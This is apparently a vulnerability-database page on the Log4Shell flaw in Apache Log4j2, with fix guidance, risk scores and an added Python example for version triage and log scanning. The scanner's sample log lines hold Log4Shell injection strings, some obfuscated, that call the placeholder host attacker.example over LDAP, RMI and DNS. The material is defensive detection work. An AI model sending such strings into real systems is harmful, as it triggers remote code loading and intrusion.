CVE-2021-44228
critical-risk
Published 2021-12-10
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Do I need to act?
EPSS score: 94.4% (estimated probability of exploitation in the next 30 days).
CISA KEV: actively exploited in the wild. Listed on the Known Exploited Vulnerabilities catalog; federal agencies must patch.
Fix available. As the description above states, 2.15.0 only disables message lookups by default and is still in the affected range; upgrade to 2.16.0 or later, or to 2.12.2, 2.12.3 or 2.3.1 on the older 2.12.x and 2.3.x release lines, which remove the lookup feature entirely. Only log4j-core is affected; log4net, log4cxx and other Apache Logging Services projects are not.
Fix commits: 38513a7d57343881f7bf58f37e67d6a87e0a47c5, ad361d2e517e765f69db464d9407ac2dd80bc93e, c30a1398a6697fb832c650870c44284d0052103e, 4eb3cf16d99f0332878b1b57f2b22b0fd737602f, 6b788facd3479dfe9052b3a5e13f6603dce8c16f, 901c8714622056af05d757d9360b1d384604a4da
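The two checks a responder needs from the description and fix notes above, as an added example that is not part of this page or of the Log4j project: a version triage that encodes the affected range given in the description (2.0-beta9 through 2.15.0, excluding the backported security releases 2.12.2, 2.12.3 and 2.3.1), and a log scanner that collapses the nested-lookup obfuscation Log4j's innermost-first lookup resolution allows (${lower:...}, ${upper:...} and the ${key:-default} fallback form) before matching on a jndi: lookup. The version-string format, the sample access-log lines and the host attacker.example are constructed for the example and are assumptions, not data from the page.

```python
import re

# --- 1. Version triage -------------------------------------------------------
# Affected range taken from the advisory text: 2.0-beta9 through 2.15.0,
# excluding the backported security releases 2.12.2, 2.12.3 and 2.3.1.
# Version strings are assumed to look like log4j-core Maven versions
# ("2.14.1", "2.0-beta9", "2.0-rc2"); anything else raises.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$")
_STAGE_RANK = {"beta": 0, "rc": 1, None: 2}   # pre-releases sort before the final

def version_key(version):
    """Turn a log4j-core version string into a sortable tuple."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised log4j-core version: {version!r}")
    major, minor, patch, stage, stage_num = m.groups()
    return (int(major), int(minor), int(patch or 0),
            _STAGE_RANK[stage], int(stage_num or 0))

FIRST_AFFECTED = version_key("2.0-beta9")
LAST_AFFECTED = version_key("2.15.0")
SAFE_BACKPORTS = {version_key(v) for v in ("2.12.2", "2.12.3", "2.3.1")}

def is_vulnerable_version(version):
    """True if this log4j-core version falls in the CVE-2021-44228 range."""
    key = version_key(version)
    return FIRST_AFFECTED <= key <= LAST_AFFECTED and key not in SAFE_BACKPORTS

# --- 2. Log scanning ---------------------------------------------------------
# Log4j resolves ${...} lookups innermost-first, so attackers hide "jndi" behind
# nested lookups such as ${lower:j} or the ${key:-default} fallback form
# (${::-j} is a lookup with an empty key whose default value is "j"). We emulate
# just enough of that resolution to normalise the text before matching.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

def _resolve_one(body):
    """Resolve a single lookup body that contains no nested lookups."""
    if ":-" in body:                          # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    prefix, sep, value = body.partition(":")
    if sep and prefix.lower() == "lower":
        return value.lower()
    if sep and prefix.lower() == "upper":
        return value.upper()
    return "${" + body + "}"                  # unknown lookup: keep it literal

def normalize_lookups(text, max_rounds=32):
    """Collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        resolved = _INNERMOST.sub(lambda m: _resolve_one(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text

_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:[^}]*\}", re.IGNORECASE)

def find_jndi_lookups(line):
    """Return (scheme, normalised lookup) for every JNDI lookup in a log line."""
    normalised = normalize_lookups(line)
    return [(m.group(1).lower(), m.group(0)) for m in _JNDI.finditer(normalised)]

def scan_log(lines):
    """Return (line index, scheme, lookup) for each hit across a log."""
    return [(i, scheme, lookup)
            for i, line in enumerate(lines)
            for scheme, lookup in find_jndi_lookups(line)]

# Constructed sample access-log lines (not real traffic); attacker.example is a
# placeholder host. The last line carries a benign ${date:...} lookup that must
# not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:rmi}://attacker.example/b}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '10.0.0.13 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.68.0"',
]

if __name__ == "__main__":
    for v in ("2.14.1", "2.15.0", "2.12.2", "2.16.0", "2.0-beta8"):
        state = "VULNERABLE" if is_vulnerable_version(v) else "not affected"
        print(f"log4j-core {v}: {state}")
    for idx, scheme, lookup in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {scheme} lookup -> {lookup}")
```

The normaliser deliberately leaves unknown lookups literal and stops when a pass changes nothing, so a benign ${date:yyyy} or an already-plain ${jndi:...} never loops; the scheme captured by find_jndi_lookups (ldap, rmi, dns, and so on) is what the description calls "LDAP and other JNDI related endpoints", and is the field worth pivoting on when hunting across a fleet.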
CVSS 10.0/10, Critical (attack vector: Network; attack complexity: Low)
Affected Products (20)
References (103)
Third Party Advisory: http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Exe...
Third Party Advisory: http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.h...
Third Party Advisory: http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html
Third Party Advisory: http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html
Third Party Advisory: http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.htm...
Third Party Advisory: http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Byp...
Third Party Advisory: http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-...
Third Party Advisory: http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Exe...
Mailing List: http://seclists.org/fulldisclosure/2022/Jul/11
Mailing List: http://seclists.org/fulldisclosure/2022/Mar/23
and 83 more references
Get this data via API
curl -H "Authorization: Bearer YOUR_KEY" \
https://cyber.phasetransitions.ai/api/v1/cves/CVE-2021-44228
Free tier: 100 requests/day, no credit card.
Risk score: 93/100 (critical-risk)
Severity: 33/34, Critical
Exploitability: 27/34, High
Exposure: 33/34, Critical